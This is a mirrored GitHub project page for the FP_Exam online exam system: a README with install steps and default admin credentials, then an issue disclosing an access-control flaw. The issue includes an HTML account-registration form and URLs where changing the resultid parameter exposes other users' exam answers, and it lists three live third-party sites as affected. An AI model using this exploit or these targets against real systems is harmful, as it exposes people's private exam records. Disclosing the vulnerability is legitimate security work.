Giter Site home page Giter Site logo

fp_exam's Introduction

方配在线考试系统(FP_Exam)

方配在线考试系统是一款基于B/S架构免费的在线考试系统,您可以用于学校、企事业单位和培训机构等在互联网或局域网上实现无纸化考试学习,系统提供单选题、多选题、判断题、填空题、问答题等多种题型的考试,同时提供海量题目的题库管理,除了简单的题目录入方式之外,还提供了Excel等题目的批量录入,大大方便了题目录入工作。在线考试系统出题提供三种试卷的组卷方式:手工组卷、随机组卷等方式,给考生以不同方式来练习撑握知识点。

方配在线考试系统安装说明

1、本地双击运行【WMSServer.exe】服务端软件即可打开考试系统登录界面,管理员账号:admin 密码:123456。

2、系统后台登录地址为http://您的域名:端口/admin/login.aspx,例如本地域名是localhost,端口号为8010,访问地址则为http://localhost:8010/admin/login.aspx 初始管理员账号:admin 密码:123456

3、本系统支持两种数据库SqlServer和Access,免费版为Access数据库,收费版为SqlServer数据库,两个版本没有功能上的限制,如果您考试人数较多,收费版的处理速度将会更快。

4、本软件为B/S架构,客户端不需要安装任何软件,只需在浏览器中输入http://服务器端IP地址:8010 即可访问。

5、本软件安装可支持IIS或有.NET2.0的虚拟空间,IIS站点安装或空间请自行配置,或购买收费版我们将指导IIS上安装配置。

6、演示地址:http://fpexam.fangpage.com

7、使用手册:https://www.kancloud.cn/fangpage/fpexam/689518


方配软件技术有限责任公司版权所有

方配官方网站 http://www.fangpage.com QQ:12677206 交流群:17672212

fp_exam's People

Contributors

fangpage avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

fp_exam's Issues

Wrong permissions lead to access everyone's answers and results

FP_Exam is a widely used online test platform, like LockDown Browser.
First step, register a test account, this is a general user.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.fpexam.fangpage.com/common/api/reg_acount.aspx" method="POST">
      <input type="hidden" name="username" value="test12345" />
      <input type="hidden" name="realname" value="test" />
      <input type="hidden" name="repeat" value="test12345" />
      <input type="hidden" name="password" value="test12345" />
      <input type="hidden" name="email" value="test&#64;test&#46;com" />
      <input type="hidden" name="mobile" value="1234512345" />
      <input type="hidden" name="departid" value="6" />
      <!-- somesites doesn't need choose depart, it's the test for offical demo-->
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

and then, visit your exam history: http://demo.fpexam.fangpage.com/examhistory.aspx
it's empty because you did't take part in exams.
Third, visit:
http://demo.fpexam.fangpage.com/examanswer.aspx?resultid=4 (admin's answer)
http://demo.fpexam.fangpage.com/examanswer.aspx?resultid=44 (User's answer)
you can change the resultid to access different user's examination paper and different answer.
testanswer.aspx,questionview.aspx and other parameters have same problem.

some test websites are following:
http://www.nsfzsq.cn:83/
http://vod.cqnu0001.com/
http://ks.jiankangyixue.cn/

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.